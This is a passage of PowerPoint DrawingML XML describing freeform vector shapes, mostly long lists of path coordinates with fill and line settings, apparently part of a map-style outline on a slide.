                      <a:pt x="2497" y="653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2499" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2500" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2507" y="663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2509" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2517" y="663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2521" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2526" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2530" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2538" y="649"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2542" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2543" y="632"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2548" y="611"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2551" y="605"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2557" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2561" y="611"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2562" y="616"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2562" y="622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2570" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2579" y="622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2585" y="618"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2591" y="618"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2594" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2600" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2603" y="632"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2601" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2603" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2605" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2613" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2615" y="647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2627" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2629" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2637" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2640" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2647" y="663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2648" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2645" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2646" y="643"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2652" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2657" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2658" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2657" y="628"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2655" y="622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2651" y="618"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2649" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2648" y="612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2653" y="613"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2661" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2668" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2676" y="621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2673" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2670" y="612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2669" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2680" y="616"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2685" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2688" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2695" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2697" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2697" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2694" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2690" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2688" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2676" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2671" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2665" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2658" y="565"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2651" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2646" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2642" y="565"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2635" y="560"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2628" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2628" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2627" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2632" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2632" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2630" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2630" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2623" y="589"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2616" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2618" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2615" y="554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2612" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2611" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2610" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2603" y="532"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2576" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2570" y="511"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2558" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2538" y="488"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="45" y="983"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="45" y="983"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2" y="983"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="983"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="984"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="983"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="981"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="979"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="974"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="970"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="969"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="969"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="967"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="966"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="966"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="966"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="966"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="966"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="965"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="964"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="961"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="959"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="961"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="964"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="965"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="971"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="971"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="971"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="974"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="978"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="979"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="979"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="983"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2284" y="823"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2282" y="826"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2284" y="823"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1538" y="1099"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1538" y="1099"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1949" y="1007"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1942" y="1013"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1937" y="1013"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1935" y="1014"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1933" y="1017"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1936" y="1022"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1935" y="1031"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1933" y="1039"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1932" y="1041"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1933" y="1052"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1939" y="1062"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1940" y="1067"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1941" y="1075"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1940" y="1090"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1940" y="1105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1939" y="1113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1937" y="1123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1934" y="1126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1935" y="1129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1936" y="1135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1938" y="1139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1939" y="1147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1935" y="1153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1934" y="1158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1937" y="1167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1932" y="1179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1934" y="1189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1937" y="1194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1941" y="1185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1943" y="1179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1946" y="1176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1948" y="1176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1954" y="1179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1959" y="1192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1961" y="1179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1958" y="1172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1954" y="1170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1949" y="1161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1948" y="1158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1946" y="1148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1947" y="1142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1948" y="1130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1952" y="1119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1955" y="1117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1956" y="1116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1964" y="1116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1969" y="1120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1978" y="1128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1971" y="1109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1964" y="1092"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1959" y="1075"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1955" y="1066"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1953" y="1057"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1953" y="1048"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1955" y="1039"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1956" y="1034"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1956" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1955" y="1019"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1952" y="1012"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1949" y="1007"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="589" y="270"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="595" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="603" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="606" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="644" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="642" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="644" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="679" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="695" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="710" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="741" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="779" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="757" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="739" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="737" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="731" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="718" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="696" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="660" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="658" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="652" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="628" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="622" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="601" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="595" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="542" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="550" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="553" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="585" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="270"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="520" y="304"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="527" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="529" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="528" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="516" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="503" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="503" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="516" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="538" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="538" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="550" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="553" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="585" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="576" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="571" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="576" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="571" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="527" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="304"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36274" name="Freeform 6"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3054" y="1888"/>
                <a:ext cx="47" cy="25"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 47"/>
                  <a:gd name="T1" fmla="*/ 24 h 25"/>
                  <a:gd name="T2" fmla="*/ 8 w 47"/>
                  <a:gd name="T3" fmla="*/ 24 h 25"/>
                  <a:gd name="T4" fmla="*/ 24 w 47"/>
                  <a:gd name="T5" fmla="*/ 25 h 25"/>
                  <a:gd name="T6" fmla="*/ 45 w 47"/>
                  <a:gd name="T7" fmla="*/ 24 h 25"/>
                  <a:gd name="T8" fmla="*/ 45 w 47"/>
                  <a:gd name="T9" fmla="*/ 22 h 25"/>
                  <a:gd name="T10" fmla="*/ 45 w 47"/>
                  <a:gd name="T11" fmla="*/ 20 h 25"/>
                  <a:gd name="T12" fmla="*/ 45 w 47"/>
                  <a:gd name="T13" fmla="*/ 17 h 25"/>
                  <a:gd name="T14" fmla="*/ 46 w 47"/>
                  <a:gd name="T15" fmla="*/ 15 h 25"/>
                  <a:gd name="T16" fmla="*/ 47 w 47"/>
                  <a:gd name="T17" fmla="*/ 14 h 25"/>
                  <a:gd name="T18" fmla="*/ 47 w 47"/>
                  <a:gd name="T19" fmla="*/ 13 h 25"/>
                  <a:gd name="T20" fmla="*/ 47 w 47"/>
                  <a:gd name="T21" fmla="*/ 11 h 25"/>
                  <a:gd name="T22" fmla="*/ 46 w 47"/>
                  <a:gd name="T23" fmla="*/ 10 h 25"/>
                  <a:gd name="T24" fmla="*/ 44 w 47"/>
                  <a:gd name="T25" fmla="*/ 10 h 25"/>
                  <a:gd name="T26" fmla="*/ 44 w 47"/>
                  <a:gd name="T27" fmla="*/ 8 h 25"/>
                  <a:gd name="T28" fmla="*/ 43 w 47"/>
                  <a:gd name="T29" fmla="*/ 7 h 25"/>
                  <a:gd name="T30" fmla="*/ 41 w 47"/>
                  <a:gd name="T31" fmla="*/ 7 h 25"/>
                  <a:gd name="T32" fmla="*/ 40 w 47"/>
                  <a:gd name="T33" fmla="*/ 7 h 25"/>
                  <a:gd name="T34" fmla="*/ 36 w 47"/>
                  <a:gd name="T35" fmla="*/ 7 h 25"/>
                  <a:gd name="T36" fmla="*/ 35 w 47"/>
